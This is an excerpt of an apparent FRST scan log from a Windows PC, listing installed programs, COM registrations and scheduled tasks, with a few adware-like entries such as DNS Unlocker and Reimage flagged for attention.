Kaspersky Internet Security (HKLM-x32\...\InstallWIX_{653C1B5A-3287-47B1-8613-07
45D4E771C4}) (Version: 15.0.0.463 - Kaspersky Lab)
Kaspersky Internet Security (x32 Version: 15.0.0.463 - Kaspersky Lab) Hidden
KMSnano 24 (HKLM\...\KMSnano 24_is1) (Version: KMSnano 24 - )
Learning Essentials for Microsoft Office (HKLM-x32\...\{75F3A4B2-F6E8-434D-A2EFDBBC016C6CB2}) (Version: 2.0 - Microsoft)
Macromedia Dreamweaver 8 (HKLM-x32\...\{0837A661-FEC3-48B3-876C-91E7D32048A9}) (
Version: 8.0.0.2734 - Macromedia)
Macromedia Extension Manager (HKLM-x32\...\{5546CDB5-2CE2-498B-B059-5B3BF81FC41F
}) (Version: 1.7.240 - Macromedia, Inc.)
Magic Academy (x32 Version: 2.2.0.98 - WildTangent) Hidden
Malware Protection Live (HKLM-x32\...\MalwareProtectionLive) (Version: - )
Mendeley Desktop 1.13.8 (HKLM-x32\...\Mendeley Desktop) (Version: 1.13.8 - Mende
ley Ltd.)
Microsoft Math (HKLM-x32\...\{07043840-959A-4B0D-8825-2C533F0DDB19}) (Version: 2
007 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM-x32\...\Office15.PROPLUS) (Version
: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version
: 5.1.41212.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473
D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Student 2007 for Learning Essentials (HKLM-x32\...\{Microsoft Student
2007_54A0E938-8390-489F-8F1A-563673334DFE}) (Version: - )
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf
-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE
-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C70
01-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporatio
n)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D
76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporatio
n)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F
6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25
302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F
1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corpor
ation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9B
E518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corpor
ation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E
5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106 (HKLM-x32\...\{6e8f
74e0-43bd-4dce-8477-6ff6828acc07}) (Version: 11.0.51106.1 - Microsoft Corporatio
n)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67
548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporatio
n)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1
fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporatio
n)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft
Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.60724 - Micros
oft Corporation)
MiKTeX 2.9 (HKLM\...\MiKTeX 2.9) (Version: 2.9 - MiKTeX.org)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 45.0.1 (x86 fr) (HKLM-x32\...\Mozilla Firefox 45.0.1 (x86 fr)) (
Version: 45.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 4
5.0.1.5918 - Mozilla)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Vers
ion: 4.30.2100.0 - Microsoft Corporation)
MySQL Connector C++ 1.1.6 (HKLM\...\{80EE5F65-5553-47A1-B6A9-8BF3211D21A3}) (Ver
sion: 1.1.6 - Oracle and/or its affiliates)
MySQL Connector J (HKLM-x32\...\{8A9B23F6-9C1D-4DB2-8254-EAB70EF4325B}) (Version
: 5.1.36 - Oracle Corporation)
MySQL Connector Net 6.9.7 (HKLM-x32\...\{2C148B86-FF80-49A7-BA18-E4CEF6464AE6})
(Version: 6.9.7 - Oracle)
MySQL Connector/C 6.1 (HKLM\...\{ABC3A516-54E3-414B-B501-762E7FB2F9D5}) (Version
: 6.1.6 - Oracle Corporation)
MySQL Connector/ODBC 5.3 (HKLM\...\{A1991404-2634-47E1-BC45-8F3B5014B1D1}) (Vers
ion: 5.3.4 - Oracle Corporation)
MySQL Documents 5.6 (HKLM-x32\...\{4D17B5C1-7388-4647-9A24-D5FDD173D4EA}) (Versi
on: 5.6.27 - Oracle Corporation)
MySQL Examples and Samples 5.6 (HKLM-x32\...\{3E1DCC2B-8A78-4E91-B2EC-9DCFE25D41
FA}) (Version: 5.6.27 - Oracle Corporation)
MySQL For Excel 1.3.4 (HKLM-x32\...\{A0352E65-6E78-48B3-B6D6-B3208E663249}) (Ver
sion: 1.3.4 - Oracle)
MySQL Installer - Community (HKLM-x32\...\{9A6E1C77-5B57-43C5-9B96-95ABDE40AE7F}
) (Version: 1.4.11.0 - Oracle Corporation)
MySQL Notifier 1.1.6 (HKLM-x32\...\{CB76A6E9-B184-461D-A8BE-7D0D73199545}) (Vers
ion: 1.1.6 - Oracle)
MySQL Server 5.6 (HKLM\...\{861A680B-2084-444B-BE8D-89E153BEEEE3}) (Version: 5.6
.27 - Oracle Corporation)
Nero 8 (HKLM-x32\...\{9EDBB857-8028-49CD-B9C9-0B4D10CD1033}) (Version: 8.10.293
- Nero AG)
OCR Software by I.R.I.S. 14.5 (HKLM\...\HPOCR) (Version: 14.5 - HP)
Office Regenerator (HKLM-x32\...\{2E2E7A4E-9FA7-4E9D-A875-53B9F943F14E}) (Versio
n: 20.11.0003 - Abstradrome)
Office Timeline (HKLM-x32\...\{08E5CEB9-36D2-4F52-9320-1DF41686A69A}) (Version:
3.6.0 - Office Timeline)
Outils de vérification linguistique 2013 de Microsoft Office - Français (x32 Version:
15.0.4569.1506 - Microsoft Corporation) Hidden
PCTeX version 6.1 (HKLM-x32\...\PCTeXv6_is1) (Version: - )
PDF Annotator 5.0.0.511 (HKLM-x32\...\PDFAnnotator_is1) (Version: 5.0.0.511 - GR
AHL software design)
Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidd
en
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
Premium Sound HD (HKLM\...\{000A208E-1050-4181-AC37-E13DA9254B73}) (Version: 1.1
2.6000 - DTS, Inc.)
Print to PDF Annotator (novaPDF OEM 7.7 printer) (HKLM\...\Print to PDF Annotato
r_is1) (Version: 7.7.400 - Softland)
PrtScr 1.5 (HKLM-x32\...\PrtScr_is1) (Version: - FireStarter)
Quantum GIS Lisboa 1.8.0 Lisboa (HKLM-x32\...\Quantum GIS Lisboa) (Version: - Q
GIS Development Team)
QuickTime 7 (HKLM-x32\...\{80CEEB1E-0A6C-45B9-A312-37A1D25FDEBC}) (Version: 7.78
.80.95 - Apple Inc.)
RealDownloader (x32 Version: 18.1.3.103 - RealNetworks, Inc.) Hidden
RealDownloader (x32 Version: 18.1.3.104 - RealNetworks) Hidden
RealNetworks - Microsoft Visual C++ 2008 Runtime (x32 Version: 9.0 - RealNetwork
s, Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (Version: 10.0 - RealNetworks,
Inc) Hidden
RealNetworks - Microsoft Visual C++ 2010 Runtime (x32 Version: 10.0 - RealNetwor
ks, Inc) Hidden
RealPlayer (RealTimes) (HKLM-x32\...\RealPlayer 18.1) (Version: 18.1.3 - RealNet
works)
REALTEK Bluetooth Driver (HKLM-x32\...\{9D3D8C60-A5EF-4123-B2B9-172095903AB}) (V
ersion: 3.800.800.121813 - REALTEK Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEE
D9A476}) (Version: 8.3.730.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-9581
08FE7DBC}) (Version: 6.0.1.6794 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}
) (Version: 6.1.8400.30136 - Realtek Semiconductor Corp.)
Realtek WLAN Driver (HKLM-x32\...\{9D3D8C60-A55F-4fed-B2B9-173001290E16}) (Versi
on: 2.00.0020 - REALTEK Semiconductor Corp.)
RealUpgrade 1.1 (x32 Version: 1.1.0 - RealNetworks, Inc.) Hidden
Reimage Protector (HKLM\...\Reimage Protector) (Version: - Reimage) <==== ATTEN
TION
Scan (x32 Version: 14.0.1.0 - Hewlett-Packard) Hidden
Scanjet 5590 (HKLM\...\{A64EBD98-D9FB-4014-8658-F61C0EFFB87C}) (Version: 14.5 HP)
Screencast-O-Matic v2.0 (HKLM-x32\...\Screencast-O-Matic v2.0) (Version: v2-1.8
- Screencast-O-Matic)
Service Pack 1 for Microsoft Office 2013 (KB2850036) 32-Bit Edition (HKLM-x32\..
.\{90150000-0011-0000-0000-0000000FF1CE}_Office15.PROPLUS_{7F6C4883-A18C-459A-82
C1-A2F9403F2DA6}) (Version: - Microsoft)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Ver
sion: 10.0.0 - McAfee)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Versi
on: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.8 (HKLM-x32\...\{6A0549A9-1B96-498C-ACBC-3943001FEB19}) (Version: 7.8.102
- Skype Technologies S.A.)
SR9USB (HKLM-x32\...\{DA387CD3-3524-43BF-B744-17C9FE27734D}) (Version: 1.00.1037
7.0 - SUPERAL Semiconductor, Inc.)
Stata 13 (HKLM-x32\...\{217BE429-022D-4094-960F-0376E1CBE13E}) (Version: 13.0 StataCorp LP)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.16.3 Synaptics Incorporated)
Texmaker (HKLM-x32\...\Texmaker) (Version: - )
TeXstudio 2.9.4 (HKLM-x32\...\TeXstudio_is1) (Version: 2.9.4 - Benito van der Za
nder)
TOSHIBA Desktop Assist (HKLM\...\{95CCACF0-010D-45F0-82BF-858643D8BC02}) (Versio
n: 1.00.08.6402 - Toshiba Corporation)
TOSHIBA eco Utility (HKLM\...\{5944B9D4-3C2A-48DE-931E-26B31714A2F7}) (Version:
2.0.0.6415 - Toshiba Corporation)
TOSHIBA Function Key (HKLM\...\{16562A90-71BC-41A0-B890-D91B0C267120}) (Version:
1.00.6626.6410 - Toshiba Corporation)
TOSHIBA Manuals (HKLM-x32\...\{90FF4432-21B7-4AF6-BA6E-FB8C1FED9173}) (Version:
10.10 - TOSHIBA)
TOSHIBA Password Utility (HKLM-x32\...\InstallShield_{78931270-BC9E-441A-A52B-73
ECD4ACFAB5}) (Version: 2.00.973 - Toshiba Corporation)
TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Ver
sion: 1.8.17.640104 - Toshiba Corporation)
TOSHIBA Recovery Media Creator (HKLM-x32\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15F
DF}) (Version: 2.2.1.54043006 - Toshiba Corporation)
TOSHIBA Resolution+ Plug-in for Windows Media Player (HKLM-x32\...\{6CB76C9D-80C
2-4CB3-A4CD-D96B239E3F94}) (Version: 1.2.2.00 - TOSHIBA Corporation)
TOSHIBA Service Station (HKLM\...\{B8C8422F-01F1-4791-B084-047AAFF9BFCC}) (Versi
on: 2.4.4 - TOSHIBA)
TOSHIBA System Driver (HKLM-x32\...\{1E6A96A1-2BAB-43EF-8087-30437593C66C}) (Ver
sion: 1.00.0015 - Toshiba Corporation)
TOSHIBA System Settings (HKLM-x32\...\{05A55927-DB9B-4E26-BA44-828EBFF829F0}) (V
ersion: 1.00.0002.32002 - Toshiba Corporation)
Toshiba TEMPRO (HKLM-x32\...\{F76F5214-83A8-4030-80C9-1EF57391D72A}) (Version: 4
.3.3 - Toshiba Europe GmbH)
TOSHIBA VIDEO PLAYER (HKLM\...\{FF07604E-C860-40E9-A230-E37FA41F103A}) (Version:
5.1.0.21-A - Toshiba Corporation)
Update for Skype for Business 2015 (KB3039776) 32-Bit Edition (HKLM-x32\...\{901
50000-012B-0409-0000-0000000FF1CE}_Office15.PROPLUS_{9F6B3627-AF9E-40A5-AAD5-349
7C4327616}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114831) 32-Bit Edition (HKLM-x32\...\{901
50000-0011-0000-0000-0000000FF1CE}_Office15.PROPLUS_{BAEE7A38-3C9E-44DC-9E43-19F
C94DD77E2}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114831) 32-Bit Edition (HKLM-x32\...\{901
50000-002A-0000-1000-0000000FF1CE}_Office15.PROPLUS_{BAEE7A38-3C9E-44DC-9E43-19F
C94DD77E2}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114831) 32-Bit Edition (HKLM-x32\...\{901
50000-012B-0409-0000-0000000FF1CE}_Office15.PROPLUS_{BAEE7A38-3C9E-44DC-9E43-19F
C94DD77E2}) (Version: - Microsoft)
Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden
UpdateService (x32 Version: 1.0.0 - RealNetworks, Inc.) Hidden
VCRedistSetup (x32 Version: 1.0.0 - Nero AG) Hidden
Video Downloader (x32 Version: 1.0.0 - RealNetworks) Hidden
Virtual Villagers 4 - The Tree of Life (x32 Version: 2.2.0.98 - WildTangent) Hid
den
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
VSee (HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\VSee) (Version: 15.0
.0.1018 - VSee Lab Inc)
WebReg (x32 Version: 140.0.297.017 - Hewlett-Packard) Hidden
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version
: 1.0.3.0 - WildTangent)
WildTangent Games App (Toshiba Games) (x32 Version: 4.0.9.7 - WildTangent) Hidde
n
Windows Driver Package - Hewlett-Packard Image (12/27/2006 8.0.0.0) (HKLM\...\A
86F74A8853ED6B1102811674C7B366AF1B276BB) (Version: 12/27/2006 8.0.0.0 - HewlettPackard)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - M
icrosoft Corporation)
Windows Media Player Firefox Plugin (HKLM-x32\...\{69FDFBB6-351D-4B8C-89D8-867DC
9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)
WinMend Folder Hidden 1.5.3 (HKLM-x32\...\WinMend Folder Hidden_is1) (Version:
- WinMend.com)
WinRAR 5.21 beta 1 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.1 - win.ra
r GmbH)
XAMPP (HKLM-x32\...\xampp) (Version: 5.6.8-0 - Bitnami)
YTD Video Downloader 5.1.0 (HKLM-x32\...\{1a413f37-ed88-4fec-9666-5c48dc4b7bb7})
(Version: 5.1.0 - GreenTree Applications SRL) <==== ATTENTION
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. T
he file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{00
5A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\REVERIEN\AppData\R
oaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{14
23F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{5C
8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{71
DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\REVERIEN\AppData\L
ocal\Microsoft\OneDrive\17.3.6302.0225\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{78
550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{79
3EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{82
0D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.
exe (Intel Corporation)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{C3
BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{CC
182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{D0
336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Local\Google\Update\1.3.25.11\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{D1
EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{E8
CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Local\Google\Update\1.3.29.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{EC
D97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB
314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB
314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB
314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB
314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB
314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB
314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB
314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB
314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1240968423-981972810-3087361095-1001_Classes\CLSID\{FB
C9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\REVERIEN\AppData\
Roaming\Dropbox\bin\DropboxExt64.34.dll (Dropbox, Inc.)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. T
he file will not be moved unless listed separately.)
Task: {037C1E69-2352-4B71-BF9F-41F90E188F8F} - System32\Tasks\{B427AFCD-2507-455
E-962F-0A755643BDDC} => pcalua.exe -a C:\Users\REVERIEN\Downloads\setup_basic_48
00_14-5(1).exe -d C:\Users\REVERIEN\Downloads
Task: {06652989-4F08-4C22-9929-45FEAD589085} - System32\Tasks\{8B398634-E508-401
C-8F40-1E6B8018FAF9} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l
ightinstaller&ver=5.3.0.111.259&LastError=404
Task: {08F320F2-51C3-40FA-901E-6299F4ED245D} - System32\Tasks\Toshiba\CommonNoti
fier => C:\Program Files (x86)\Toshiba TEMPRO\Toshiba.Tempro.UI.CommonNotifier.e
xe [2013-01-04] (Toshiba Europe GmbH)
Task: {1B3DA511-80EE-4124-9D8C-4214B6F9F7C7} - System32\Tasks\Trigger KMS Activa
tion => C:\Program Files\KMSnano\TriggerKMS.exe [2013-01-26] ()
Task: {1B690D77-BED4-4BD3-87B3-77B30470B172} - System32\Tasks\{335127B4-0212-47B
8-A6F6-BB6DFEC8DC4C} => pcalua.exe -a C:\Users\REVERIEN\Documents\Downloads\Prog
rams\pdf-annotator-5.exe -d C:\Users\REVERIEN\Documents\Downloads\Programs
Task: {1C4D72AE-A136-44B9-AB6D-618DC414022A} - System32\Tasks\LaunchPreSignup =>
C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION
Task: {43142973-CF66-4C75-9A9C-BD86A7D56A2C} - System32\Tasks\{DE380E56-84B4-4F7
8-91DA-6FEB3482985D} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l
ightinstaller&ver=5.3.0.111.259&LastError=404
Task: {435AE71D-CBDE-4DDF-A504-6D7A8DC77019} - System32\Tasks\Adobe Flash Player
Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [201
6-03-24] (Adobe Systems Incorporated)
Task: {4754F53F-BCD6-4CEB-AE31-E3D1081F2919} - System32\Tasks\RealDownloader Upd
ate Check => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe
[2016-02-03] ()
Task: {4899038C-645F-4F99-B06E-C6C53E90E8E8} - System32\Tasks\GoogleUpdateTaskUs
erS-1-5-21-1240968423-981972810-3087361095-1001UA => C:\Users\REVERIEN\AppData\L
ocal\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {4D2B6648-C88F-42D0-801A-2BC13B0D4419} - System32\Tasks\Microsoft\Windows\
Setup\8.1 auto install ping => C:\Windows\system32\AutoUpdate.exe
Task: {52FC6D96-0F79-4D7F-9016-C45F51E68844} - System32\Tasks\{B4A54807-95C1-4C5
6-AD99-3A2CF5B1A653} => pcalua.exe -a C:\Users\REVERIEN\Documents\Downloads\Prog
rams\setup_basic_4800_14-5_2.exe -d C:\Users\REVERIEN\AppData\Roaming\IDM
Task: {57B2A906-6471-42D9-813A-6ECC1BB8FE03} - System32\Tasks\Microsoft\Windows\
RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-15] (Microsoft Corpo
ration)
Task: {620EA6A0-7874-4884-8744-C548E5709A0F} - System32\Tasks\Microsoft\Office\O
fficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe
[2014-01-22] (Microsoft Corporation)
Task: {698FBBBE-2414-4D8D-8C84-3409AD2E7EE0} - System32\Tasks\RealDownloaderReal
UpgradeLogonTaskS-1-5-21-1240968423-981972810-3087361095-1001 => C:\Program File
s (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2016-02-03] (RealNetworks,
Inc.)
Task: {7194F166-8483-4E63-B348-4665129E173B} - System32\Tasks\Microsoft\Windows\
Setup\8.1 auto install v2 => C:\WINDOWS\system32\AutoUpdate.exe
Task: {71B218C2-3599-478E-A2FD-5AD8943CB636} - System32\Tasks\{B7687898-7A46-489
6-A5EA-EF2E5B2F59D6} => pcalua.exe -a G:\RRutayis\Pavilion\Softwares\setup_basic
_4800.exe -d G:\RRutayis\Pavilion\Softwares
Task: {7224D3F7-19A1-42EC-BECA-439673C57A55} - System32\Tasks\Microsoft\Office\O
ffice 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Share
d\Office15\OLicenseHeartbeat.exe
Task: {74DE945E-A8A9-46D9-B7C6-43D6200BA2FF} - System32\Tasks\AutoKMS => C:\WIND
OWS\AutoKMS\AutoKMS.exe [2016-04-02] ()
Task: {7D852E04-7098-426F-97C2-C15FEBB19066} - System32\Tasks\{E0A32E87-8F44-4B7
3-8A8D-7619716B55C8} => Firefox.exe hxxp://www.skype.com/go/downloading?source=l
ightinstaller&ver=5.3.0.111.259&LastError=404
Task: {86BE8531-BCDB-49B1-BB53-F1B51B1F2651} - System32\Tasks\Microsoft\Office\O
fficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.
exe [2014-01-22] (Microsoft Corporation)
Task: {86F486B0-1990-4CFA-8DC2-329407DD0A02} - System32\Tasks\DropboxUpdateTaskU
serS-1-5-21-1240968423-981972810-3087361095-1001Core => C:\Users\REVERIEN\AppDat
a\Local\Dropbox\Update\DropboxUpdate.exe [2015-08-21] (Dropbox, Inc.)
Task: {872982BD-00DC-422F-B1CE-6E49E2B5AB8D} - System32\Tasks\Synaptics TouchPad
Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: {8FE78DF6-0309-4FB0-B487-BF13C767D48D} - System32\Tasks\DNSWALTERS => C:\P
rogram Files (x86)\DNS Unlocker\dnswalters.exe [2016-02-28] () <==== ATTENTION
Task: {9A470131-2390-407D-92E7-6C23D45E2A43} - System32\Tasks\RealDownloaderReal
UpgradeScheduledTaskS-1-5-21-1240968423-981972810-3087361095-1001 => C:\Program
Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2016-02-03] (RealNetwor
ks, Inc.)
Task: {9FA8A24B-5779-4D13-ABBD-0AEA47FDA1C1} - System32\Tasks\Apple\AppleSoftwar
eUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015
-08-27] (Apple Inc.)
Task: {A6597B70-BC68-4E4E-9418-E07ADAB6CD49} - System32\Tasks\TOSHIBA\Service St
ation => C:\Program Files\TOSHIBA\Toshiba Service Station\ToshibaServiceStation.
exe [2012-07-27] (TOSHIBA Corporation)
Task: {A6A1D5E0-2A0D-4605-8355-ED76B01EE13A} - System32\Tasks\GoogleUpdateTaskMa
chineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-03-18] (G
oogle Inc.)
Task: {A7B29358-293E-4C2F-B46F-0E6B97C3127C} - System32\Tasks\MySQLNotifierTask
